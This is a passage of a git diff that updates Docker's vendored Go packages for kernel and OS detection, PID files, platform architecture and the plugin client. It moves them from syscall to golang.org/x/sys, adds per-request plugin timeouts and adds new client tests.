ParseRelease(string(uts.Release[:bytes.IndexByte(uts.Release[:], 0)])) } // CheckKernelVersion checks if current kernel is newer than (or equal to) diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go index dc8c0e307b..2f36490c53 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go index 80fab8ff64..b7b15a1fd2 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go @@ -1,11 +1,10 @@ -// +build windows - -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "fmt" - "syscall" - "unsafe" + + "golang.org/x/sys/windows" + "golang.org/x/sys/windows/registry" ) // VersionInfo holds information about the kernel. @@ -23,41 +22,24 @@ func (k *VersionInfo) String() string { // GetKernelVersion gets the current kernel version. func GetKernelVersion() (*VersionInfo, error) { - var ( - h syscall.Handle - dwVersion uint32 - err error - ) - KVI := &VersionInfo{"Unknown", 0, 0, 0} - if err = syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, - syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), - 0, - syscall.KEY_READ, - &h); err != nil { + k, err := registry.OpenKey(registry.LOCAL_MACHINE, `SOFTWARE\Microsoft\Windows NT\CurrentVersion`, registry.QUERY_VALUE) + if err != nil { return KVI, err } - defer syscall.RegCloseKey(h) + defer k.Close() - var buf [1 << 10]uint16 - var typ uint32 - n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 - - if err = syscall.RegQueryValueEx(h, - syscall.StringToUTF16Ptr("BuildLabEx"), - nil, - &typ, - (*byte)(unsafe.Pointer(&buf[0])), - &n); err != nil { + blex, _, err := k.GetStringValue("BuildLabEx") + if err != nil { return KVI, err } - - KVI.kvi = syscall.UTF16ToString(buf[:]) + KVI.kvi = blex // Important - docker.exe MUST be manifested for this API to return // the correct information. - if dwVersion, err = syscall.GetVersion(); err != nil { + dwVersion, err := windows.GetVersion() + if err != nil { return KVI, err } diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go index bb9b32641e..212ff4502b 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go @@ -1,18 +1,16 @@ -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" -import ( - "syscall" -) +import "golang.org/x/sys/unix" // Utsname represents the system name structure. -// It is passthrough for syscall.Utsname in order to make it portable with +// It is passthrough for unix.Utsname in order to make it portable with // other platforms where it is not available. -type Utsname syscall.Utsname +type Utsname unix.Utsname -func uname() (*syscall.Utsname, error) { - uts := &syscall.Utsname{} +func uname() (*unix.Utsname, error) { + uts := &unix.Utsname{} - if err := syscall.Uname(uts); err != nil { + if err := unix.Uname(uts); err != nil { return nil, err } return uts, nil diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go index 49370bd3dd..b2139b60e8 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go @@ -1,4 +1,4 @@ -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "golang.org/x/sys/unix" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go index 1da3f239fa..97906e4cd7 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!solaris +// +build !linux -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go index e04a3499af..b251d6aed6 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go @@ -1,6 +1,6 @@ // Package operatingsystem provides helper function to get the operating system // name for different platforms. -package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( "bufio" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go deleted file mode 100644 index d08ad14860..0000000000 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go +++ /dev/null @@ -1,37 +0,0 @@ -// +build solaris,cgo - -package operatingsystem - -/* -#include -*/ -import "C" - -import ( - "bytes" - "errors" - "io/ioutil" -) - -var etcOsRelease = "/etc/release" - -// GetOperatingSystem gets the name of the current operating system. -func GetOperatingSystem() (string, error) { - b, err := ioutil.ReadFile(etcOsRelease) - if err != nil { - return "", err - } - if i := bytes.Index(b, []byte("\n")); i >= 0 { - b = bytes.Trim(b[:i], " ") - return string(b), nil - } - return "", errors.New("release not found") -} - -// IsContainerized returns true if we are running inside a container. -func IsContainerized() (bool, error) { - if C.getzoneid() != 0 { - return true, nil - } - return false, nil -} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go index bc91c3c533..f4792d37d5 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go @@ -1,6 +1,6 @@ // +build freebsd darwin -package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go index e7120c65c4..d10ed4cdcd 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go index 3c86b6af9c..372de51469 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go @@ -1,43 +1,45 @@ -package operatingsystem +package operatingsystem // import "github.com/docker/docker/pkg/parsers/operatingsystem" import ( - "syscall" - "unsafe" -) + "fmt" -// See https://code.google.com/p/go/source/browse/src/pkg/mime/type_windows.go?r=d14520ac25bf6940785aabb71f5be453a286f58c -// for a similar sample + "golang.org/x/sys/windows/registry" +) // GetOperatingSystem gets the name of the current operating system. func GetOperatingSystem() (string, error) { - var h syscall.Handle - // Default return value ret := "Unknown Operating System" - if err := syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, - syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), - 0, - syscall.KEY_READ, - &h); err != nil { + k, err := registry.OpenKey(registry.LOCAL_MACHINE, `SOFTWARE\Microsoft\Windows NT\CurrentVersion`, registry.QUERY_VALUE) + if err != nil { return ret, err } - defer syscall.RegCloseKey(h) - - var buf [1 << 10]uint16 - var typ uint32 - n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 - - if err := syscall.RegQueryValueEx(h, - syscall.StringToUTF16Ptr("ProductName"), - nil, - &typ, - (*byte)(unsafe.Pointer(&buf[0])), - &n); err != nil { + defer k.Close() + + pn, _, err := k.GetStringValue("ProductName") + if err != nil { + return ret, err + } + ret = pn + + ri, _, err := k.GetStringValue("ReleaseId") + if err != nil { + return ret, err + } + ret = fmt.Sprintf("%s Version %s", ret, ri) + + cbn, _, err := k.GetStringValue("CurrentBuildNumber") + if err != nil { + return ret, err + } + + ubr, _, err := k.GetIntegerValue("UBR") + if err != nil { return ret, err } - ret = syscall.UTF16ToString(buf[:]) + ret = fmt.Sprintf("%s (OS Build %s.%d)", ret, cbn, ubr) return ret, nil } diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers.go b/vendor/github.com/docker/docker/pkg/parsers/parsers.go index acc897168f..c4186a4c0a 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/parsers.go +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers.go @@ -1,7 +1,7 @@ // Package parsers provides helper functions to parse and validate different type // of string. It can be hosts, unix addresses, tcp addresses, filters, kernel // operating system versions. -package parsers +package parsers // import "github.com/docker/docker/pkg/parsers" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go index 7f19e90279..a70093f1c4 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go @@ -1,4 +1,4 @@ -package parsers +package parsers // import "github.com/docker/docker/pkg/parsers" import ( "reflect" diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go index d832fea7a2..0617a89e5f 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go @@ -1,7 +1,7 @@ // Package pidfile provides structure and helper functions to create and remove // PID file. A PID file is usually a file used to store the process ID of a // running process. -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( "fmt" @@ -37,7 +37,7 @@ func New(path string) (*PIDFile, error) { return nil, err } // Note MkdirAll returns nil if a directory already exists - if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755)); err != nil { + if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755), ""); err != nil { return nil, err } if err := ioutil.WriteFile(path, []byte(fmt.Sprintf("%d", os.Getpid())), 0644); err != nil { @@ -49,8 +49,5 @@ func New(path string) (*PIDFile, error) { // Remove removes the PIDFile. func (file PIDFile) Remove() error { - if err := os.Remove(file.path); err != nil { - return err - } - return nil + return os.Remove(file.path) } diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go index 5c1cd7ab85..92746aa7bf 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go @@ -1,18 +1,14 @@ // +build darwin -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( - "syscall" + "golang.org/x/sys/unix" ) func processExists(pid int) bool { // OS X does not have a proc filesystem. // Use kill -0 pid to judge if the process exists. - err := syscall.Kill(pid, 0) - if err != nil { - return false - } - - return true + err := unix.Kill(pid, 0) + return err == nil } diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go index 73e8af76db..cd9878e1e4 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go @@ -1,4 +1,4 @@ -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go index 1bf5221e3b..cc6696d211 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go @@ -1,6 +1,6 @@ // +build !windows,!darwin -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go index ae489c627a..1c5e6cb654 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go @@ -1,6 +1,8 @@ -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" -import "syscall" +import ( + "golang.org/x/sys/windows" +) const ( processQueryLimitedInformation = 0x1000 @@ -9,13 +11,13 @@ const ( ) func processExists(pid int) bool { - h, err := syscall.OpenProcess(processQueryLimitedInformation, false, uint32(pid)) + h, err := windows.OpenProcess(processQueryLimitedInformation, false, uint32(pid)) if err != nil { return false } var c uint32 - err = syscall.GetExitCodeProcess(h, &c) - syscall.Close(h) + err = windows.GetExitCodeProcess(h, &c) + windows.Close(h) if err != nil { return c == stillActive } diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go index 2cdc2c5918..a260a23f4f 100644 --- a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go @@ -1,16 +1,18 @@ // Package platform provides helper function to get the runtime architecture // for different platforms. -package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( - "syscall" + "bytes" + + "golang.org/x/sys/unix" ) // runtimeArchitecture gets the name of the current architecture (x86, x86_64, …) func runtimeArchitecture() (string, error) { - utsname := &syscall.Utsname{} - if err := syscall.Uname(utsname); err != nil { + utsname := &unix.Utsname{} + if err := unix.Uname(utsname); err != nil { return "", err } - return charsToString(utsname.Machine), nil + return string(utsname.Machine[:bytes.IndexByte(utsname.Machine[:], 0)]), nil } diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go index 45bbcf1535..d51f68698f 100644 --- a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go @@ -1,8 +1,8 @@ -// +build freebsd solaris darwin +// +build freebsd darwin // Package platform provides helper function to get the runtime architecture // for different platforms. -package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( "os/exec" diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go index c5f684ddfa..a25f1bc516 100644 --- a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go @@ -1,4 +1,4 @@ -package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/platform/platform.go b/vendor/github.com/docker/docker/pkg/platform/platform.go index e4b03122f4..f6b02b734a 100644 --- a/vendor/github.com/docker/docker/pkg/platform/platform.go +++ b/vendor/github.com/docker/docker/pkg/platform/platform.go @@ -1,9 +1,9 @@ -package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( "runtime" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) var ( diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go deleted file mode 100644 index 5dcbadfdfe..0000000000 --- a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go +++ /dev/null @@ -1,18 +0,0 @@ -// +build linux,386 linux,amd64 linux,arm64 -// see golang's sources src/syscall/ztypes_linux_*.go that use int8 - -package platform - -// Convert the OS/ARCH-specific utsname.Machine to string -// given as an array of signed int8 -func charsToString(ca [65]int8) string { - s := make([]byte, len(ca)) - var lens int - for ; lens < len(ca); lens++ { - if ca[lens] == 0 { - break - } - s[lens] = uint8(ca[lens]) - } - return string(s[0:lens]) -} diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go deleted file mode 100644 index c9875cf6e6..0000000000 --- a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go +++ /dev/null @@ -1,18 +0,0 @@ -// +build linux,arm linux,ppc64 linux,ppc64le s390x -// see golang's sources src/syscall/ztypes_linux_*.go that use uint8 - -package platform - -// Convert the OS/ARCH-specific utsname.Machine to string -// given as an array of unsigned uint8 -func charsToString(ca [65]uint8) string { - s := make([]byte, len(ca)) - var lens int - for ; lens < len(ca); lens++ { - if ca[lens] == 0 { - break - } - s[lens] = ca[lens] - } - return string(s[0:lens]) -} diff --git a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go index dde5f66035..370e0d5b97 100644 --- a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go +++ b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go @@ -1,22 +1,39 @@ -package plugingetter +package plugingetter // import "github.com/docker/docker/pkg/plugingetter" -import "github.com/docker/docker/pkg/plugins" +import ( + "net" + "time" + + "github.com/docker/docker/pkg/plugins" +) const ( - // LOOKUP doesn't update RefCount - LOOKUP = 0 - // ACQUIRE increments RefCount - ACQUIRE = 1 - // RELEASE decrements RefCount - RELEASE = -1 + // Lookup doesn't update RefCount + Lookup = 0 + // Acquire increments RefCount + Acquire = 1 + // Release decrements RefCount + Release = -1 ) -// CompatPlugin is a abstraction to handle both v2(new) and v1(legacy) plugins. +// CompatPlugin is an abstraction to handle both v2(new) and v1(legacy) plugins. type CompatPlugin interface { - Client() *plugins.Client Name() string - BasePath() string + ScopedPath(string) string IsV1() bool + PluginWithV1Client +} + +// PluginWithV1Client is a plugin that directly utilizes the v1/http plugin client +type PluginWithV1Client interface { + Client() *plugins.Client +} + +// PluginAddr is a plugin that exposes the socket address for creating custom clients rather than the built-in `*plugins.Client` +type PluginAddr interface { + Addr() net.Addr + Timeout() time.Duration + Protocol() string } // CountedPlugin is a plugin which is reference counted. diff --git a/vendor/github.com/docker/docker/pkg/plugins/client.go b/vendor/github.com/docker/docker/pkg/plugins/client.go index e8e730eb58..0353305358 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/client.go +++ b/vendor/github.com/docker/docker/pkg/plugins/client.go @@ -1,7 +1,8 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "bytes" + "context" "encoding/json" "io" "io/ioutil" @@ -9,10 +10,11 @@ import ( "net/url" "time" - "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/plugins/transport" "github.com/docker/go-connections/sockets" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" ) const ( @@ -57,20 +59,20 @@ func NewClient(addr string, tlsConfig *tlsconfig.Options) (*Client, error) { } // NewClientWithTimeout creates a new plugin client (http). -func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeoutInSecs int) (*Client, error) { +func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeout time.Duration) (*Client, error) { clientTransport, err := newTransport(addr, tlsConfig) if err != nil { return nil, err } - return newClientWithTransport(clientTransport, timeoutInSecs), nil + return newClientWithTransport(clientTransport, timeout), nil } // newClientWithTransport creates a new plugin client with a given transport. -func newClientWithTransport(tr transport.Transport, timeoutInSecs int) *Client { +func newClientWithTransport(tr transport.Transport, timeout time.Duration) *Client { return &Client{ http: &http.Client{ Transport: tr, - Timeout: time.Duration(timeoutInSecs) * time.Second, + Timeout: timeout, }, requestFactory: tr, } @@ -82,16 +84,33 @@ type Client struct { requestFactory transport.RequestFactory } +// RequestOpts is the set of options that can be passed into a request +type RequestOpts struct { + Timeout time.Duration +} + +// WithRequestTimeout sets a timeout duration for plugin requests +func WithRequestTimeout(t time.Duration) func(*RequestOpts) { + return func(o *RequestOpts) { + o.Timeout = t + } +} + // Call calls the specified method with the specified arguments for the plugin. // It will retry for 30 seconds if a failure occurs when calling. -func (c *Client) Call(serviceMethod string, args interface{}, ret interface{}) error { +func (c *Client) Call(serviceMethod string, args, ret interface{}) error { + return c.CallWithOptions(serviceMethod, args, ret) +} + +// CallWithOptions is just like call except it takes options +func (c *Client) CallWithOptions(serviceMethod string, args interface{}, ret interface{}, opts ...func(*RequestOpts)) error { var buf bytes.Buffer if args != nil { if err := json.NewEncoder(&buf).Encode(args); err != nil { return err } } - body, err := c.callWithRetry(serviceMethod, &buf, true) + body, err := c.callWithRetry(serviceMethod, &buf, true, opts...) if err != nil { return err } @@ -128,18 +147,31 @@ func (c *Client) SendFile(serviceMethod string, data io.Reader, ret interface{}) return nil } -func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) (io.ReadCloser, error) { - req, err := c.requestFactory.NewRequest(serviceMethod, data) - if err != nil { - return nil, err - } - +func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool, reqOpts ...func(*RequestOpts)) (io.ReadCloser, error) { var retries int start := time.Now() + var opts RequestOpts + for _, o := range reqOpts { + o(&opts) + } + for { + req, err := c.requestFactory.NewRequest(serviceMethod, data) + if err != nil { + return nil, err + } + + cancelRequest := func() {} + if opts.Timeout > 0 { + var ctx context.Context + ctx, cancelRequest = context.WithTimeout(req.Context(), opts.Timeout) + req = req.WithContext(ctx) + } + resp, err := c.http.Do(req) if err != nil { + cancelRequest() if !retry { return nil, err } @@ -157,6 +189,7 @@ func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) if resp.StatusCode != http.StatusOK { b, err := ioutil.ReadAll(resp.Body) resp.Body.Close() + cancelRequest() if err != nil { return nil, &statusError{resp.StatusCode, serviceMethod, err.Error()} } @@ -176,7 +209,11 @@ func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) // old way... return nil, &statusError{resp.StatusCode, serviceMethod, string(b)} } - return resp.Body, nil + return ioutils.NewReadCloserWrapper(resp.Body, func() error { + err := resp.Body.Close() + cancelRequest() + return err + }), nil } } diff --git a/vendor/github.com/docker/docker/pkg/plugins/client_test.go b/vendor/github.com/docker/docker/pkg/plugins/client_test.go index 9faad86a15..c3a4892272 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/client_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/client_test.go @@ -1,16 +1,22 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( + "bytes" + "context" + "encoding/json" "io" "net/http" "net/http/httptest" "net/url" - "reflect" + "strings" "testing" "time" "github.com/docker/docker/pkg/plugins/transport" "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -38,6 +44,26 @@ func TestFailedConnection(t *testing.T) { } } +func TestFailOnce(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + failed := false + mux.HandleFunc("/Test.FailOnce", func(w http.ResponseWriter, r *http.Request) { + if !failed { + failed = true + panic("Plugin not ready") + } + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + b := strings.NewReader("body") + _, err := c.callWithRetry("Test.FailOnce", b, true) + if err != nil { + t.Fatal(err) + } +} + func TestEchoInputOutput(t *testing.T) { addr := setupRemotePluginServer() defer teardownRemotePluginServer() @@ -62,9 +88,7 @@ func TestEchoInputOutput(t *testing.T) { t.Fatal(err) } - if !reflect.DeepEqual(output, m) { - t.Fatalf("Expected %v, was %v\n", m, output) - } + assert.Check(t, is.DeepEqual(m, output)) err = c.Call("Test.Echo", nil, nil) if err != nil { t.Fatal(err) @@ -132,3 +156,122 @@ func TestClientScheme(t *testing.T) { } } } + +func TestNewClientWithTimeout(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + time.Sleep(time.Duration(600) * time.Millisecond) + io.Copy(w, r.Body) + }) + + // setting timeout of 500ms + timeout := time.Duration(500) * time.Millisecond + c, _ := NewClientWithTimeout(addr, &tlsconfig.Options{InsecureSkipVerify: true}, timeout) + var output Manifest + err := c.Call("Test.Echo", m, &output) + if err == nil { + t.Fatal("Expected timeout error") + } +} + +func TestClientStream(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + var output Manifest + + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s", r.Method) + } + + header := w.Header() + header.Set("Content-Type", transport.VersionMimetype) + + io.Copy(w, r.Body) + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + body, err := c.Stream("Test.Echo", m) + if err != nil { + t.Fatal(err) + } + defer body.Close() + if err := json.NewDecoder(body).Decode(&output); err != nil { + t.Fatalf("Test.Echo: error reading plugin resp: %v", err) + } + assert.Check(t, is.DeepEqual(m, output)) +} + +func TestClientSendFile(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + var output Manifest + var buf bytes.Buffer + if err := json.NewEncoder(&buf).Encode(m); err != nil { + t.Fatal(err) + } + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s\n", r.Method) + } + + header := w.Header() + header.Set("Content-Type", transport.VersionMimetype) + + io.Copy(w, r.Body) + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + if err := c.SendFile("Test.Echo", &buf, &output); err != nil { + t.Fatal(err) + } + assert.Check(t, is.DeepEqual(m, output)) +} + +func TestClientWithRequestTimeout(t *testing.T) { + timeout := 1 * time.Millisecond + testHandler := func(w http.ResponseWriter, r *http.Request) { + time.Sleep(timeout + 1*time.Millisecond) + w.WriteHeader(http.StatusOK) + } + + srv := httptest.NewServer(http.HandlerFunc(testHandler)) + defer srv.Close() + + client := &Client{http: srv.Client(), requestFactory: &testRequestWrapper{srv}} + _, err := client.callWithRetry("/Plugin.Hello", nil, false, WithRequestTimeout(timeout)) + assert.Assert(t, is.ErrorContains(err, ""), "expected error") + + err = errors.Cause(err) + + switch e := err.(type) { + case *url.Error: + err = e.Err + } + assert.DeepEqual(t, context.DeadlineExceeded, err) +} + +type testRequestWrapper struct { + *httptest.Server +} + +func (w *testRequestWrapper) NewRequest(path string, data io.Reader) (*http.Request, error) { + req, err := http.NewRequest("POST", path, data) + if err != nil { + return nil, err + } + u, err := url.Parse(w.Server.URL) + if err != nil { + return nil, err + } + req.URL = u + return req, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery.go b/vendor/github.com/docker/docker/pkg/plugins/discovery.go index e99581c573..4b79bd29ad 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery.go @@ -1,8 +1,7 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "encoding/json" - "errors" "fmt" "io/ioutil" "net/url" @@ -10,6 +9,8 @@ import ( "path/filepath" "strings" "sync" + + "github.com/pkg/errors" ) var ( @@ -28,30 +29,52 @@ func newLocalRegistry() localRegistry { // Scan scans all the plugin paths and returns all the names it found func Scan() ([]string, error) { var names []string - if err := filepath.Walk(socketsPath, func(path string, fi os.FileInfo, err error) error { - if err != nil { - return nil + dirEntries, err := ioutil.ReadDir(socketsPath) + if err != nil && !os.IsNotExist(err) { + return nil, errors.Wrap(err, "error reading dir entries") + } + + for _, fi := range dirEntries { + if fi.IsDir() { + fi, err = os.Stat(filepath.Join(socketsPath, fi.Name(), fi.Name()+".sock")) + if err != nil { + continue + } } if fi.Mode()&os.ModeSocket != 0 { - name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) - names = append(names, name) + names = append(names, strings.TrimSuffix(filepath.Base(fi.Name()), filepath.Ext(fi.Name()))) } - return nil - }); err != nil { - return nil, err } - for _, path := range specsPaths { - if err := filepath.Walk(path, func(p string, fi os.FileInfo, err error) error { - if err != nil || fi.IsDir() { - return nil + for _, p := range specsPaths { + dirEntries, err := ioutil.ReadDir(p) + if err != nil && !os.IsNotExist(err) { + return nil, errors.Wrap(err, "error reading dir entries") + } + + for _, fi := range dirEntries { + if fi.IsDir() { + infos, err := ioutil.ReadDir(filepath.Join(p, fi.Name())) + if err != nil { + continue + } + + for _, info := range infos { + if strings.TrimSuffix(info.Name(), filepath.Ext(info.Name())) == fi.Name() { + fi = info + break + } + } + } + + ext := filepath.Ext(fi.Name()) + switch ext { + case ".spec", ".json": + plugin := strings.TrimSuffix(fi.Name(), ext) + names = append(names, plugin) + default: } - name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) - names = append(names, name) - return nil - }); err != nil { - return nil, err } } return names, nil @@ -81,7 